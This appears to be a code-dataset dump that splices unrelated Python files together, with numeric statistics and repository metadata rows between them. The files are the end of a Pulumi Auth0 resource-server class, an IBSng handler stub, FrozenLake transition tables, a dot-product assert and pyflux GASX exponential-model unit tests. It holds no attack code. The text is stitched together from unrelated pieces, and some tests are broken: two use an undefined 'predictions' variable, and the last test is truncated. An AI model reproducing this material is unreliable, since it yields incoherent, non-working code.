:param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
:param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
:param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
:param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
:param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
:param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
:param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
:param pulumi.Input[str] verification_location: String
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResourceServerState.__new__(_ResourceServerState)
__props__.__dict__["allow_offline_access"] = allow_offline_access
__props__.__dict__["enforce_policies"] = enforce_policies
__props__.__dict__["identifier"] = identifier
__props__.__dict__["name"] = name
__props__.__dict__["options"] = options
__props__.__dict__["scopes"] = scopes
__props__.__dict__["signing_alg"] = signing_alg
__props__.__dict__["signing_secret"] = signing_secret
__props__.__dict__["skip_consent_for_verifiable_first_party_clients"] = skip_consent_for_verifiable_first_party_clients
__props__.__dict__["token_dialect"] = token_dialect
__props__.__dict__["token_lifetime"] = token_lifetime
__props__.__dict__["token_lifetime_for_web"] = token_lifetime_for_web
__props__.__dict__["verification_location"] = verification_location
return ResourceServer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowOfflineAccess")
def allow_offline_access(self) -> pulumi.Output[Optional[bool]]:
"""
Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
"""
return pulumi.get(self, "allow_offline_access")
@property
@pulumi.getter(name="enforcePolicies")
def enforce_policies(self) -> pulumi.Output[Optional[bool]]:
"""
Boolean. Indicates whether or not authorization polices are enforced.
"""
return pulumi.get(self, "enforce_policies")
@property
@pulumi.getter
def identifier(self) -> pulumi.Output[Optional[str]]:
"""
String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
"""
return pulumi.get(self, "identifier")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
String. Friendly name for the resource server. Cannot include `<` or `>` characters.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def options(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Map(String). Used to store additional metadata
"""
return pulumi.get(self, "options")
@property
@pulumi.getter
def scopes(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceServerScope']]]:
"""
Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter(name="signingAlg")
def signing_alg(self) -> pulumi.Output[str]:
"""
String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
"""
return pulumi.get(self, "signing_alg")
@property
@pulumi.getter(name="signingSecret")
def signing_secret(self) -> pulumi.Output[str]:
"""
String. Secret used to sign tokens when using symmetric algorithms (HS256).
"""
return pulumi.get(self, "signing_secret")
@property
@pulumi.getter(name="skipConsentForVerifiableFirstPartyClients")
def skip_consent_for_verifiable_first_party_clients(self) -> pulumi.Output[Optional[bool]]:
"""
Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
"""
return pulumi.get(self, "skip_consent_for_verifiable_first_party_clients")
@property
@pulumi.getter(name="tokenDialect")
def token_dialect(self) -> pulumi.Output[Optional[str]]:
"""
String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
"""
return pulumi.get(self, "token_dialect")
@property
@pulumi.getter(name="tokenLifetime")
def token_lifetime(self) -> pulumi.Output[int]:
"""
Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
"""
return pulumi.get(self, "token_lifetime")
@property
@pulumi.getter(name="tokenLifetimeForWeb")
def token_lifetime_for_web(self) -> pulumi.Output[int]:
"""
Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
"""
return pulumi.get(self, "token_lifetime_for_web")
@property
@pulumi.getter(name="verificationLocation")
def verification_location(self) -> pulumi.Output[Optional[str]]:
"""
String
"""
return pulumi.get(self, "verification_location")
| 50.871391 | 236 | 0.677613 | 4,511 | 38,764 | 5.592552 | 0.05276 | 0.086769 | 0.088116 | 0.047091 | 0.930474 | 0.924608 | 0.916878 | 0.913747 | 0.909822 | 0.896187 | 0 | 0.002964 | 0.225286 | 38,764 | 761 | 237 | 50.938239 | 0.837102 | 0.35128 | 0 | 0.873853 | 1 | 0 | 0.120393 | 0.05183 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165138 | false | 0.002294 | 0.016055 | 0 | 0.279817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8df779d84910c0e33f1fd9d071ce3e335062b1fb | 191 | py | Python | ibsng/handler/isp/get_all_i_s_p_mapped_user_i_ds.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 6 | 2018-03-06T10:16:36.000Z | 2021-12-05T12:43:10.000Z | ibsng/handler/isp/get_all_i_s_p_mapped_user_i_ds.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-03-06T10:27:08.000Z | 2022-01-02T15:21:27.000Z | ibsng/handler/isp/get_all_i_s_p_mapped_user_i_ds.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-01-06T16:28:31.000Z | 2018-09-17T19:47:19.000Z | """Get all ISP mapped user IDs API method."""
from ibsng.handler.handler import Handler
class getAllISPMappedUserIDs(Handler):
"""Get all ISP mapped user IDs method class."""
pass
| 21.222222 | 51 | 0.722513 | 26 | 191 | 5.307692 | 0.576923 | 0.086957 | 0.130435 | 0.217391 | 0.318841 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17801 | 191 | 8 | 52 | 23.875 | 0.878981 | 0.424084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
5c394d043b4ca56543e290e21880e10534a4ae33 | 38 | py | Python | doc/collection/APS_32ID/non-interlaced/kwarg.py | pengdada/timbir | c9bda62d2c45cc3860a2834dd82fdc5d529ce183 | [
"BSD-3-Clause"
] | 10 | 2015-04-08T01:53:01.000Z | 2021-01-12T17:06:06.000Z | doc/collection/APS_32ID/non-interlaced/kwarg.py | pengdada/timbir | c9bda62d2c45cc3860a2834dd82fdc5d529ce183 | [
"BSD-3-Clause"
] | 13 | 2015-03-26T01:20:34.000Z | 2017-02-24T15:38:09.000Z | doc/collection/APS_32ID/non-interlaced/kwarg.py | pengdada/timbir | c9bda62d2c45cc3860a2834dd82fdc5d529ce183 | [
"BSD-3-Clause"
] | 11 | 2015-06-03T20:01:41.000Z | 2020-05-02T05:23:18.000Z | def kwarg(**kwargs):
return kwargs | 19 | 20 | 0.684211 | 5 | 38 | 5.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184211 | 38 | 2 | 21 | 19 | 0.83871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
a502fe7b523cbe9102576980f2dc4600cc9e69d8 | 8,704 | py | Python | RL/frozen_lake/transitions.py | Shuai-Xie/pytorch-examples | 1c946fc5c6d5490b86a0bac3f3896f090b2b3593 | [
"MIT"
] | null | null | null | RL/frozen_lake/transitions.py | Shuai-Xie/pytorch-examples | 1c946fc5c6d5490b86a0bac3f3896f090b2b3593 | [
"MIT"
] | null | null | null | RL/frozen_lake/transitions.py | Shuai-Xie/pytorch-examples | 1c946fc5c6d5490b86a0bac3f3896f090b2b3593 | [
"MIT"
] | null | null | null | # 0: left
# 1: down
# 2: right
# 3: up
# Deterministic, 状态转移时,确定的 prob=1,选择 action 后 100% 能达到对应 state
transi_Deterministic = {
0: {
# (prob of transitioning into the next_state,
# next_state, reward, is_end)
0: [(1.0, 0, 0.0, False)], # left 不能动
1: [(1.0, 4, 0.0, False)], # down 到 state 4
2: [(1.0, 1, 0.0, False)], # right 到 state 1
3: [(1.0, 0, 0.0, False)], # up 不能动
},
1: {0: [(1.0, 0, 0.0, False)], 1: [(1.0, 5, 0.0, True)], 2: [(1.0, 2, 0.0, False)], 3: [(1.0, 1, 0.0, False)]},
2: {0: [(1.0, 1, 0.0, False)], 1: [(1.0, 6, 0.0, False)], 2: [(1.0, 3, 0.0, False)], 3: [(1.0, 2, 0.0, False)]},
3: {0: [(1.0, 2, 0.0, False)], 1: [(1.0, 7, 0.0, True)], 2: [(1.0, 3, 0.0, False)], 3: [(1.0, 3, 0.0, False)]},
4: {0: [(1.0, 4, 0.0, False)], 1: [(1.0, 8, 0.0, False)], 2: [(1.0, 5, 0.0, True)], 3: [(1.0, 0, 0.0, False)]},
5: {0: [(1.0, 5, 0, True)], 1: [(1.0, 5, 0, True)], 2: [(1.0, 5, 0, True)], 3: [(1.0, 5, 0, True)]}, # end 态,走哪里都掉坑
6: {0: [(1.0, 5, 0.0, True)], 1: [(1.0, 10, 0.0, False)], 2: [(1.0, 7, 0.0, True)], 3: [(1.0, 2, 0.0, False)]},
7: {0: [(1.0, 7, 0, True)], 1: [(1.0, 7, 0, True)], 2: [(1.0, 7, 0, True)], 3: [(1.0, 7, 0, True)]},
8: {0: [(1.0, 8, 0.0, False)], 1: [(1.0, 12, 0.0, True)], 2: [(1.0, 9, 0.0, False)], 3: [(1.0, 4, 0.0, False)]},
9: {0: [(1.0, 8, 0.0, False)], 1: [(1.0, 13, 0.0, False)], 2: [(1.0, 10, 0.0, False)], 3: [(1.0, 5, 0.0, True)]},
10: {0: [(1.0, 9, 0.0, False)], 1: [(1.0, 14, 0.0, False)], 2: [(1.0, 11, 0.0, True)], 3: [(1.0, 6, 0.0, False)]},
11: {0: [(1.0, 11, 0, True)], 1: [(1.0, 11, 0, True)], 2: [(1.0, 11, 0, True)], 3: [(1.0, 11, 0, True)]},
12: {0: [(1.0, 12, 0, True)], 1: [(1.0, 12, 0, True)], 2: [(1.0, 12, 0, True)], 3: [(1.0, 12, 0, True)]},
13: {0: [(1.0, 12, 0.0, True)], 1: [(1.0, 13, 0.0, False)], 2: [(1.0, 14, 0.0, False)], 3: [(1.0, 9, 0.0, False)]},
14: {0: [(1.0, 13, 0.0, False)], 1: [(1.0, 14, 0.0, False)], 2: [(1.0, 15, 1.0, True)], 3: [(1.0, 10, 0.0, False)]},
15: {0: [(1.0, 15, 0, True)], 1: [(1.0, 15, 0, True)], 2: [(1.0, 15, 0, True)], 3: [(1.0, 15, 0, True)]}
}
# Slippery world, action 选定方向后有 1/3 概率到达对应 state,向左向右滑各1/3,注意是相对前进方向
transi_Slippery = {
0: {
# prob = 1/3,
0: [(0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 4, 0.0, False)],
1: [
(0.3333333333333333, 0, 0.0, False), # 1/3 左
(0.3333333333333333, 4, 0.0, False), # 1/3 正常下
(0.3333333333333333, 1, 0.0, False), # 1/3 右
],
2: [
(0.3333333333333333, 4, 0.0, False), # 1/3 下
(0.3333333333333333, 1, 0.0, False), # 1/3 正常右
(0.3333333333333333, 0, 0.0, False), # 1/3 上
],
3: [(0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 0, 0.0, False)]
},
1: {
0: [(0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 5, 0.0, True)],
1: [(0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 2, 0.0, False)],
2: [(0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False)],
3: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 0, 0.0, False)]}
,
2: {
0: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 6, 0.0, False)],
1: [(0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 3, 0.0, False)],
2: [(0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False)],
3: [(0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False)]
},
3: {0: [(0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 7, 0.0, True)],
1: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 3, 0.0, False)],
2: [(0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 3, 0.0, False)],
3: [(0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False)]},
4: {0: [(0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False)],
1: [(0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 5, 0.0, True)],
2: [(0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 0, 0.0, False)],
3: [(0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 4, 0.0, False)]},
5: {0: [(1.0, 5, 0, True)], 1: [(1.0, 5, 0, True)], 2: [(1.0, 5, 0, True)], 3: [(1.0, 5, 0, True)]}, # end 态,走哪里都掉坑
6: {0: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 10, 0.0, False)],
1: [(0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 7, 0.0, True)],
2: [(0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 2, 0.0, False)],
3: [(0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 5, 0.0, True)]},
7: {0: [(1.0, 7, 0, True)], 1: [(1.0, 7, 0, True)], 2: [(1.0, 7, 0, True)], 3: [(1.0, 7, 0, True)]},
8: {0: [(0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 12, 0.0, True)],
1: [(0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 9, 0.0, False)],
2: [(0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 4, 0.0, False)],
3: [(0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False)]},
9: {
0: [
(0.3333333333333333, 5, 0.0, True), # 上滑
(0.3333333333333333, 8, 0.0, False), # 左前进,正常
(0.3333333333333333, 13, 0.0, False), # 下滑
],
1: [(0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 10, 0.0, False)],
2: [(0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 5, 0.0, True)],
3: [(0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 8, 0.0, False)]},
10: {0: [(0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 14, 0.0, False)],
1: [(0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 11, 0.0, True)],
2: [(0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 11, 0.0, True), (0.3333333333333333, 6, 0.0, False)],
3: [(0.3333333333333333, 11, 0.0, True), (0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 9, 0.0, False)]},
11: {0: [(1.0, 11, 0, True)], 1: [(1.0, 11, 0, True)], 2: [(1.0, 11, 0, True)], 3: [(1.0, 11, 0, True)]},
12: {0: [(1.0, 12, 0, True)], 1: [(1.0, 12, 0, True)], 2: [(1.0, 12, 0, True)], 3: [(1.0, 12, 0, True)]},
13: {0: [(0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 13, 0.0, False)],
1: [(0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False)],
2: [(0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 9, 0.0, False)],
3: [(0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 12, 0.0, True)]},
14: {0: [(0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False)],
1: [(0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 15, 1.0, True)],
2: [(0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 15, 1.0, True), (0.3333333333333333, 10, 0.0, False)],
3: [(0.3333333333333333, 15, 1.0, True), (0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 13, 0.0, False)]},
15: {0: [(1.0, 15, 0, True)], 1: [(1.0, 15, 0, True)], 2: [(1.0, 15, 0, True)], 3: [(1.0, 15, 0, True)]}}
| 83.692308 | 128 | 0.52562 | 1,505 | 8,704 | 3.036545 | 0.041196 | 0.08884 | 0.208315 | 0.110284 | 0.936324 | 0.931947 | 0.855361 | 0.839825 | 0.804376 | 0.798687 | 0 | 0.484279 | 0.218061 | 8,704 | 103 | 129 | 84.504854 | 0.187188 | 0.042854 | 0 | 0.206522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a51800e96c0a6a4a77756bd398169c70e52cb3a7 | 138 | py | Python | greedy-algorithms/dot_product_tests.py | hristo-vrigazov/Algorithms | 441420ee03a8a94fc11b304e1a8cd0a65a2a1df5 | [
"MIT"
] | null | null | null | greedy-algorithms/dot_product_tests.py | hristo-vrigazov/Algorithms | 441420ee03a8a94fc11b304e1a8cd0a65a2a1df5 | [
"MIT"
] | null | null | null | greedy-algorithms/dot_product_tests.py | hristo-vrigazov/Algorithms | 441420ee03a8a94fc11b304e1a8cd0a65a2a1df5 | [
"MIT"
] | null | null | null | from dot_product import min_dot_product
assert(min_dot_product([1, 3, -5], [-2, 4, 1]) == -25)
assert(min_dot_product([23], [39]) == 897) | 34.5 | 54 | 0.673913 | 25 | 138 | 3.44 | 0.6 | 0.465116 | 0.453488 | 0.44186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122951 | 0.115942 | 138 | 4 | 55 | 34.5 | 0.581967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
ebacf8f6a3f2b8f83c6702f157544d4da9e194b5 | 18,538 | py | Python | pyflux/gas/tests/gasx_tests_exponential.py | ThomasHoppe/pyflux | 297f2afc2095acd97c12e827dd500e8ea5da0c0f | [
"BSD-3-Clause"
] | 2,091 | 2016-04-01T02:52:10.000Z | 2022-03-29T11:38:15.000Z | pyflux/gas/tests/gasx_tests_exponential.py | EricSchles/pyflux | 297f2afc2095acd97c12e827dd500e8ea5da0c0f | [
"BSD-3-Clause"
] | 160 | 2016-04-26T14:52:18.000Z | 2022-03-15T02:09:07.000Z | pyflux/gas/tests/gasx_tests_exponential.py | EricSchles/pyflux | 297f2afc2095acd97c12e827dd500e8ea5da0c0f | [
"BSD-3-Clause"
] | 264 | 2016-05-02T14:03:31.000Z | 2022-03-29T07:48:20.000Z | import numpy as np
import pandas as pd
import pyflux as pf
# Set up some data to use for the tests
countdata = np.random.exponential(3,500)
x1 = np.random.normal(0,1,500)
x2 = np.random.normal(0,1,500)
data = pd.DataFrame([countdata,x1,x2]).T
data.columns = ['y', 'x1', 'x2']
x1_oos = np.random.normal(0,1,30)
x2_oos = np.random.normal(0,1,30)
countdata_oos = np.random.exponential(3,30)
data_oos = pd.DataFrame([countdata_oos,x1_oos,x2_oos]).T
data_oos.columns = ['y', 'x1', 'x2']
def test_exponential_no_terms():
"""
Tests the length of the latent variable vector for an GASX model
with no AR or SC terms, and tests that the values are not nan
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=0, sc=0, family=pf.Exponential())
x = model.fit()
assert(len(model.latent_variables.z_list) == 2)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_exponential_couple_terms():
"""
Tests the length of the latent variable vector for an GASX model
with 1 AR and 1 SC term, and tests that the values are not nan
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_exponential_bbvi():
"""
Tests an GASX model estimated with BBVI, and tests that the latent variable
vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI',iterations=100)
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_exponential_mh():
"""
Tests an GASX model estimated with Metropolis-Hastings, and tests that the latent variable
vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('M-H',nsims=300)
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_exponential_laplace():
"""
Tests an GASX model estimated with Laplace approximation, and tests that the latent variable
vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('Laplace')
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_exponential_pml():
"""
Tests an GASX model estimated with PML, and tests that the latent variable
vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('PML')
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_exponential_predict_length():
"""
Tests that the length of the predict dataframe is equal to no of steps h
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
x.summary()
assert(model.predict(h=5, oos_data=data_oos).shape[0] == 5)
def test_exponential_predict_is_length():
"""
Tests that the length of the predict IS dataframe is equal to no of steps h
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
assert(model.predict_is(h=5).shape[0] == 5)
def test_exponential_predict_nans():
"""
Tests that the predictions are not NaNs
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
x.summary()
assert(len(model.predict(h=5, oos_data=data_oos).values[np.isnan(model.predict(h=5,
oos_data=data_oos).values)]) == 0)
def test_exponential_predict_is_nans():
"""
Tests that the predictions in-sample are not NaNs
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
x.summary()
assert(len(model.predict_is(h=5).values[np.isnan(model.predict_is(h=5).values)]) == 0)
def test_predict_nonconstant():
"""
We should not really have predictions that are constant (should be some difference)...
This captures bugs with the predict function not iterating forward
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
assert(not np.all(predictions.values==predictions.values[0]))
def test_predict_is_nonconstant():
"""
We should not really have predictions that are constant (should be some difference)...
This captures bugs with the predict function not iterating forward
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
assert(not np.all(predictions.values==predictions.values[0]))
def test_predict_intervals():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
model.fit()
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test_predict_is_intervals():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
model.fit()
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test_predict_intervals_bbvi():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test_predict_is_intervals_bbvi():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test_predict_intervals_mh():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('M-H', nsims=400)
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test_predict_is_intervals_mh():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('M-H', nsims=400)
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test_sample_model():
"""
Tests sampling function
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
